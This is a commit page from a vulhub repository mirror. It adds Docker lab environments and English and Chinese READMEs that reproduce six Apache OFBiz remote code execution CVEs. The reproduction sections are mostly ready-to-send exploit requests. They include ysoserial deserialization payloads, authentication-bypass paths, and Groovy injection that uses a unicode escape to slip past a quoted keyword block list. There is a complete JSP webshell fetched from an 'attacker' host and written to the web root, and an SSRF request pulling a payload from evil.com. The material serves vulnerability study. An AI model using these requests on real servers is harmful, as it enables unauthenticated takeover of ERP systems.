aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
ofbiz/CVE-2020-9496/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 388 KiB

BIN
ofbiz/CVE-2020-9496/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 616 KiB

BIN
ofbiz/CVE-2020-9496/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 48 KiB

69
ofbiz/CVE-2020-9496/README.md Normal file
View File

@@ -0,0 +1,69 @@
# Unsafe deserialization of XMLRPC arguments in ApacheOfBiz (CVE-2020-9496)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
OfBiz exposes an XMLRPC endpoint at `/webtools/control/xmlrpc`. This is an unauthenticated endpoint since authentication is applied on a per-service basis. However, the XMLRPC request is processed before authentication. As part of this processing, any serialized arguments for the remote invocation are deserialized, therefore if the classpath contains any classes that can be used as gadgets to achieve remote code execution, an attacker will be able to run arbitrary system commands on any OfBiz server with same privileges as the servlet container running OfBiz.
References:
1. https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
2. https://github.com/dwisiswant0/CVE-2020-9496
3. https://www.cnblogs.com/ph4nt0mer/p/13576739.html
## Vulnerable environment
Executing following command to start an Apache OfBiz (17.12.01):
```
docker compose up -d
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
There is no error message in response by default, we can't reproduce the vulnerability using the POC of [reference link 2](https://github.com/dwisiswant0/CVE-2020-9496), so ask [ysoserial](https://github.com/frohoff/ysoserial) for help.
Generate the CommonsBeanutils1 payload:
```
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
```
![](1.png)
Replace the `[base64-payload]` and send the request:
```
POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
```
![](2.png)
`touch /tmp/success` is succesful executing in the container:
![](3.png)

67
ofbiz/CVE-2020-9496/README.zh-cn.md Normal file
View File

@@ -0,0 +1,67 @@
# Apache OfBiz 反序列化命令执行漏洞CVE-2020-9496
Apache OFBiz是一个非常著名的电子商务平台是一个非常著名的开源项目提供了创建基于最新J2EE/XML规范和技术标准构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。
其17.12.04版本之前的XMLRPC接口存在一处反序列化漏洞攻击者利用这个漏洞可以在目标服务器上执行任意命令。
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
- https://github.com/dwisiswant0/CVE-2020-9496
- https://www.cnblogs.com/ph4nt0mer/p/13576739.html
## 漏洞环境
执行如下命令启动一个Apache OfBiz 17.12.01版本:
```
docker compose up -d
```
在等待数分钟后,访问`https://localhost:8443/accounting`查看到登录页面,说明环境已启动成功。
## 漏洞复现
由于默认情况下没有报错信息,所以使用[参考连接2](https://github.com/dwisiswant0/CVE-2020-9496)中给出的方法无法正确判断漏洞是否存在,还是需要通过执行反序列化来复现漏洞。
使用[ysoserial](https://github.com/frohoff/ysoserial)的CommonsBeanutils1来生成Payload
```
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
```
![](1.png)
将base64后的payload替换并发送如下数据包
```
POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
```
![](2.png)
进入容器中,可见`touch /tmp/success`已成功执行:
![](3.png)

6
ofbiz/CVE-2020-9496/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:17.12.01
ports:
- "8443:8443"
- "5005:5005"

BIN
ofbiz/CVE-2023-49070/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 388 KiB

BIN
ofbiz/CVE-2023-49070/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 76 KiB

BIN
ofbiz/CVE-2023-49070/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 179 KiB

BIN
ofbiz/CVE-2023-49070/4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 52 KiB

74
ofbiz/CVE-2023-49070/README.md Normal file
View File

@@ -0,0 +1,74 @@
# Unsafe deserialization of XMLRPC arguments in Apache OFBiz (CVE-2023-49070)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
Apahce OFBiz prior to 17.12.03, there is a deserialization issue caused by XMLRPC endpoint at `/webtools/control/xmlrpc`, which is marked as [CVE-2020-9496](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496). Developer fixed this issue by adding authentication check and filter, but the patches have been bypassed by CVE-2023-49070.
Apache OFBiz deleted XMLRPC interface to escape this nightmare at version 18.12.10 eventually.
References:
- <https://www.openwall.com/lists/oss-security/2023/12/04/2>
- <https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496>
## Vulnerable environment
Executing following command to start an Apache OfBiz 18.12.09 server:
```
docker compose up -d
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
The method to reproduce CVE-2023-49070 is similar to [CVE-2020-9496](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496), except that it requires bypassing the patches.
First of all, use [ysoserial](https://github.com/frohoff/ysoserial) to generate a CommonsBeanutils1 gadget payload:
```
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
```
![](1.png)
Sending packets using the method in CVE-2020-9496 no longer works:
![](2.png)
But modifing the path to `/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y` is able to bypass the restriction:
```
POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
```
![](3.png)
`touch /tmp/success` has been executed in the container:
![](4.png)

71
ofbiz/CVE-2023-49070/README.zh-cn.md Normal file
View File

@@ -0,0 +1,71 @@
# Apache OfBiz 反序列化命令执行漏洞CVE-2023-49070
Apache OFBiz是一个非常著名的电子商务平台是一个非常著名的开源项目提供了创建基于最新J2EE/XML规范和技术标准构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。
在Apache OFBiz 17.12.03版本及以前存在一处XMLRPC导致的反序列漏洞官方于后续的版本中对相关接口进行加固修复漏洞但修复方法存在绕过问题CVE-2023-49070攻击者仍然可以利用反序列化漏洞在目标服务器中执行任意命令。
Apache OFBiz官方于18.12.10中彻底删除xmlrpc接口修复该漏洞。
参考链接:
- <https://www.openwall.com/lists/oss-security/2023/12/04/2>
## 漏洞环境
执行如下命令启动一个Apache OfBiz 18.12.09服务器:
```
docker compose up -d
```
在等待数分钟后,访问`https://localhost:8443/accounting`查看到登录页面,说明环境已启动成功。
## 漏洞复现
漏洞复现方式与[CVE-2020-9496](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496)相似,只是需要绕过官方对于漏洞的补丁限制。
首先,仍然使用[ysoserial](https://github.com/frohoff/ysoserial)的CommonsBeanutils1来生成Payload
```
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
```
![](1.png)
使用CVE-2020-9496中的复现方法发送数据包可见已经无法成功进入XMLRPC的解析流程
![](2.png)
把Path修改成`/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y`即可绕过限制:
```
POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
```
![](3.png)
进入容器中,可见`touch /tmp/success`已成功执行:
![](4.png)

6
ofbiz/CVE-2023-49070/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:18.12.09
ports:
- "8443:8443"
- "5005:5005"

BIN
ofbiz/CVE-2023-51467/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 117 KiB

44
ofbiz/CVE-2023-51467/README.md Normal file
View File

@@ -0,0 +1,44 @@
# Apache OFBiz Authentication Bypass Leads to RCE (CVE-2023-51467)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
This vulnerability occurs as a result of incomplete fixing for [CVE-2023-49070](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2023-49070). In Apache OFBiz version 18.12.10, the developers removed the XMLRPC to fix the previous RCE issue, but the authentication bypass still exists. The researcher from Chaitin Tech found another attack approach to perform the pre-auth RCE using Groovy expression injection.
References:
- <https://github.com/apache/ofbiz-framework/commit/d8b097f6717a4004acf023dfe929e0e41ad63faa>
- <https://xz.aliyun.com/t/13211>
- <https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/>
## Vulnerable environment
Executing following command to start an Apache OfBiz 18.12.10 server:
```
docker compose up -d
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
Send following request to execute command `id` by Groovy script:
```
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
groovyProgram=throw+new+Exception('id'.execute().text);
```
![](1.png)

42
ofbiz/CVE-2023-51467/README.zh-cn.md Normal file
View File

@@ -0,0 +1,42 @@
# Apache OFBiz 鉴权绕过导致命令执行CVE-2023-51467
Apache OFBiz是一个非常著名的电子商务平台是一个非常著名的开源项目提供了创建基于最新J2EE/XML规范和技术标准构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。
这个漏洞的原因是对于[CVE-2023-49070](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2023-49070)的不完全修复。在Apache OFBiz 18.12.10版本中官方移除了可能导致RCE漏洞的XMLRPC组件但没有修复权限绕过问题。来自长亭科技的安全研究员利用这一点找到了另一个可以导致RCE的方法Groovy表达式注入。
参考连接:
- <https://github.com/apache/ofbiz-framework/commit/d8b097f6717a4004acf023dfe929e0e41ad63faa>
- <https://xz.aliyun.com/t/13211>
- <https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/>
## 漏洞环境
执行如下命令启动一个Apache OfBiz 18.12.10服务器:
```
docker compose up -d
```
在等待数分钟后,访问`https://localhost:8443/accounting`查看到登录页面,说明环境已启动成功。
## 漏洞复现
直接发送如下请求即可使用Groovy脚本执行`id`命令:
```
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
groovyProgram=throw+new+Exception('id'.execute().text);
```
![](1.png)

6
ofbiz/CVE-2023-51467/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:18.12.10
ports:
- "8443:8443"
- "5005:5005"

BIN
ofbiz/CVE-2024-38856/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 151 KiB

59
ofbiz/CVE-2024-38856/README.md Normal file
View File

@@ -0,0 +1,59 @@
# Apache OFBiz Authentication Bypass Leads to RCE (CVE-2024-38856)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
This vulnerability occurs as a result of incomplete fixing for [CVE-2023-51467](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2023-51467). In Apache OFBiz version 18.12.11, the developers believe they have fixed the vulnerability, but in reality, they have only addressed one method of exploiting it. The Groovy expression injection still exists and allows unauthorized users to execute arbitrary commands on the server.
References:
- <https://github.com/apache/ofbiz-framework/commit/31d8d7>
- <https://forum.butian.net/article/524>
- <https://github.com/Praison001/CVE-2024-38856-ApacheOfBiz>
## Vulnerable environment
Executing following command to start an Apache OfBiz 18.12.14 server:
```
docker compose up
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
Send following request to execute command `id` by Groovy script:
```
POST /webtools/control/main/ProgramExport HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Length: 190
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Disposition: form-data; name="groovyProgram"
throw new Exception('id'.\u0065xecute().text);
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ--
```
![](1.png)
Noted that Apache Ofbiz restricts the use of the following keywords, but we can bypass this restriction using Unicode characters like `\u0065xecute`.
```
deniedWebShellTokens=java.,beans,freemarker,<script,javascript,<body,body ,<form,<jsp:,<c:out,taglib,<prefix,<%@ page,<?php,exec(,alert(,\
%eval,@eval,eval(,runtime,import,passthru,shell_exec,assert,str_rot13,system,decode,include,page ,\
chmod,mkdir,fopen,fclose,new file,upload,getfilename,download,getoutputstring,readfile,iframe,object,embed,onload,build,\
python,perl ,/perl,ruby ,/ruby,process,function,class,InputStream,to_server,wget ,static,assign,webappPath,\
ifconfig,route,crontab,netstat,uname ,hostname,iptables,whoami,"cmd",*cmd|,+cmd|,=cmd|,localhost,thread,require,gzdeflate,\
execute,println,calc,touch,calculate
```

57
ofbiz/CVE-2024-38856/README.zh-cn.md Normal file
View File

@@ -0,0 +1,57 @@
# Apache OFBiz 身份验证绕过导致远程代码执行 (CVE-2024-38856)
Apache OFBiz 是一个开源的企业资源规划ERP系统。它提供了一套企业应用程序用于集成和自动化企业的许多业务流程。
这个漏洞是由于对 [CVE-2023-51467](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2023-51467) 的不完全修复而产生的。在 Apache OFBiz 18.12.11 版本中开发人员认为他们已经修复了该漏洞但实际上他们只解决了其中一种利用方法。Groovy 表达式注入仍然存在,允许未经授权的用户在服务器上执行任意命令。
References:
- <https://github.com/apache/ofbiz-framework/commit/31d8d7>
- <https://forum.butian.net/article/524>
- <https://github.com/Praison001/CVE-2024-38856-ApacheOfBiz>
## 漏洞环境
执行如下命令启动一个Apache OfBiz 18.12.10服务器:
```
docker compose up -d
```
在等待数分钟后,访问`https://localhost:8443/accounting`查看到登录页面,说明环境已启动成功。
## 漏洞复现
直接发送如下请求即可使用Groovy脚本执行`id`命令:
```
POST /webtools/control/main/ProgramExport HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Length: 190
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Disposition: form-data; name="groovyProgram"
throw new Exception('id'.\u0065xecute().text);
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ--
```
![](1.png)
值得注意的是Apache Ofbiz限制了如下一些关键词的使用我们可以通过Unicode编码来绕过这个限制比如`\u0065xecute`
```
deniedWebShellTokens=java.,beans,freemarker,<script,javascript,<body,body ,<form,<jsp:,<c:out,taglib,<prefix,<%@ page,<?php,exec(,alert(,\
%eval,@eval,eval(,runtime,import,passthru,shell_exec,assert,str_rot13,system,decode,include,page ,\
chmod,mkdir,fopen,fclose,new file,upload,getfilename,download,getoutputstring,readfile,iframe,object,embed,onload,build,\
python,perl ,/perl,ruby ,/ruby,process,function,class,InputStream,to_server,wget ,static,assign,webappPath,\
ifconfig,route,crontab,netstat,uname ,hostname,iptables,whoami,"cmd",*cmd|,+cmd|,=cmd|,localhost,thread,require,gzdeflate,\
execute,println,calc,touch,calculate
```

6
ofbiz/CVE-2024-38856/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:18.12.14
ports:
- "8443:8443"
- "5005:5005"

BIN
ofbiz/CVE-2024-45195/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 254 KiB

BIN
ofbiz/CVE-2024-45195/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 21 KiB

66
ofbiz/CVE-2024-45195/README.md Normal file
View File

@@ -0,0 +1,66 @@
# Apache OFBiz Authentication Bypass Leads to RCE (CVE-2024-45195)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
This vulnerability occurs as a result of incomplete fixing for previous vulnerabilities (CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856). In Apache OFBiz versions prior to 18.12.16, the developers implemented fixes for these previous issues, but the underlying problem of controller-view map state desynchronization still existed. This allowed attackers to bypass authentication and access sensitive admin-only view maps.
References:
- <https://github.com/apache/ofbiz-framework/commit/ab78769c2d>
- <https://github.com/apache/ofbiz-plugins/commit/8b95fe6fa>
- <https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/>
## Vulnerable environment
Executing following command to start an Apache OfBiz 18.12.15 server:
```
docker compose up -d
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
Before reproducing the vulnerability, this exploit requires setting up a malicious XML schema file and a CSV file on an attacker-controlled server
First one `rceschema.xml`, this XML schema defines the structure of the malicious JSP:
```xml
<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
<record name="rceentry" limit="many">
<field name="jsp" type="String" length="605" position="0"></field>
</record>
</data-file>
</data-files>
```
Second one `rcereport.csv`, this CSV file contains the actual JSP code:
```jsp
<%@ page import='java.io.*' %><%@ page import='java.util.*' %><h1>Ahoy!</h1><br><% String getcmd = request.getParameter("cmd"); if (getcmd != null) { out.println("Command: " + getcmd + "<br>"); String cmd1 = "/bin/sh"; String cmd2 = "-c"; String cmd3 = getcmd; String[] cmd = new String[3]; cmd[0] = cmd1; cmd[1] = cmd2; cmd[2] = cmd3; Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine();}} %>,
```
Then send the following request:
```
POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1
Host: target:8443
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
DATAFILE_LOCATION=http://attacker/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://attacker/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce
```
![](1.png)
This request exploits the vulnerability by leveraging the viewdatafile view map to write a malicious JSP file to the web root, effectively achieving remote code execution.
After the JSP webshell is written, execute arbitrary commands through `https://localhost:8443/accounting/index.jsp?cmd=id`:
![](2.png)

64
ofbiz/CVE-2024-45195/README.zh-cn.md Normal file
View File

@@ -0,0 +1,64 @@
# Apache OFBiz 身份验证绕过导致远程代码执行CVE-2024-45195
Apache OFBiz是一个开源企业资源规划ERP系统。它提供了一套企业应用程序集成并自动化企业的许多业务流程。
该漏洞是由于之前漏洞CVE-2024-32113、CVE-2024-36104和CVE-2024-38856未完全修复所导致。在Apache OFBiz版本18.12.16之前,开发人员对这些先前的问题进行了修复,但控制器视图地图状态不同步的根本问题仍然存在。这使得攻击者能够绕过身份验证并访问敏感的仅限管理员的视图地图。
参考链接:
- <https://github.com/apache/ofbiz-framework/commit/ab78769c2d>
- <https://github.com/apache/ofbiz-plugins/commit/8b95fe6fa>
- <https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/>
## 漏洞环境
执行以下命令启动一个 Apache OfBiz 18.12.15服务器:
```
docker compose up -d
```
在等待数分钟后,访问`https://localhost:8443/accounting`查看到登录页面,说明环境已启动成功。
## 漏洞复现
在复现此漏洞之前我们需要在自己控制的服务器上部署恶意XML文件和CSV文件。
第一个文件是`rceschema.xml`此XML schema文件定义了恶意 JSP 的结构:
```xml
<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
<record name="rceentry" limit="many">
<field name="jsp" type="String" length="605" position="0"></field>
</record>
</data-file>
</data-files>
```
第二个文件是`rcereport.csv`此CSV文件包含实际的JSP代码
```jsp
<%@ page import='java.io.*' %><%@ page import='java.util.*' %><h1>Ahoy!</h1><br><% String getcmd = request.getParameter("cmd"); if (getcmd != null) { out.println("Command: " + getcmd + "<br>"); String cmd1 = "/bin/sh"; String cmd2 = "-c"; String cmd3 = getcmd; String[] cmd = new String[3]; cmd[0] = cmd1; cmd[1] = cmd2; cmd[2] = cmd3; Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine();}} %>,
```
然后发送以下请求:
```
POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1
Host: target:8443
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
DATAFILE_LOCATION=http://attacker/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://attacker/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce
```
![](1.png)
该请求通过利用viewdatafile视图地图将恶意JSP文件写入Web根目录从而利用了该漏洞实现远程代码执行。
在JSP webshell被写入后通过`https://localhost:8443/accounting/index.jsp?cmd=id`即可执行任意命令:
![](2.png)

6
ofbiz/CVE-2024-45195/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:18.12.15
ports:
- "8443:8443"
- "5005:5005"

BIN
ofbiz/CVE-2024-45507/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 105 KiB

BIN
ofbiz/CVE-2024-45507/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 25 KiB

86
ofbiz/CVE-2024-45507/README.md Normal file
View File

@@ -0,0 +1,86 @@
# Apache OFBiz SSRF and Remote Code Execution (CVE-2024-45507)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
This vulnerability (CVE-2024-45507) affects Apache OFBiz versions prior to 18.12.16. It allows an unauthenticated attacker to perform Server-Side Request Forgery (SSRF) and potentially achieve remote code execution.
References:
- <https://github.com/apache/ofbiz-framework/commit/ffb1bc4879>
- <https://xz.aliyun.com/t/15569>
- <https://paper.seebug.org/3228/>
## Vulnerable environment
Execute the following command to start an Apache OFBiz 18.12.15 server:
```
docker compose up -d
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
### Server-Side Request Forgery (SSRF) attack
Send a POST request to `/webtools/control/forgotPassword/StatsSinceStart` with the following request:
```
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
statsDecoratorLocation=http://10.10.10.10/path/to/api
```
### Remote Code Execution
Create a malicious XML file (payload.xml) on a public server like `http://evil.com/ofbiz/payload.xml`:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<screens xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://ofbiz.apache.org/Widget-Screen" xsi:schemaLocation="http://ofbiz.apache.org/Widget-Screen http://ofbiz.apache.org/dtds/widget-screen.xsd">
<screen name="StatsDecorator">
<section>
<actions>
<set value="${groovy:'touch /tmp/success'.execute();}"/>
</actions>
</section>
</screen>
</screens>
```
Then replace your malicious XML url into following request and send:
```
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
statsDecoratorLocation=http://evil.com/ofbiz/payload.xml
```
![](1.png)
The command `touch /tmp/success` will be executed on the target server, demonstrating successful exploitation.
![](2.png)

84
ofbiz/CVE-2024-45507/README.zh-cn.md Normal file
View File

@@ -0,0 +1,84 @@
# Apache OFBiz SSRF 和远程代码执行漏洞CVE-2024-45507
Apache OFBiz是一个开源企业资源规划ERP系统。它提供了一套企业应用程序集成并自动化企业的许多业务流程。
Apache OFBiz 18.12.16之前的版本存在一处SSRF与远程命令执行漏洞未经身份验证的攻击者可以利用该漏洞执行任意命令并控制服务器。
参考链接:
- <https://github.com/apache/ofbiz-framework/commit/ffb1bc4879>
- <https://xz.aliyun.com/t/15569>
- <https://paper.seebug.org/3228/>
## 漏洞环境
执行以下命令启动一个Apache OFBiz 18.12.15服务器:
```
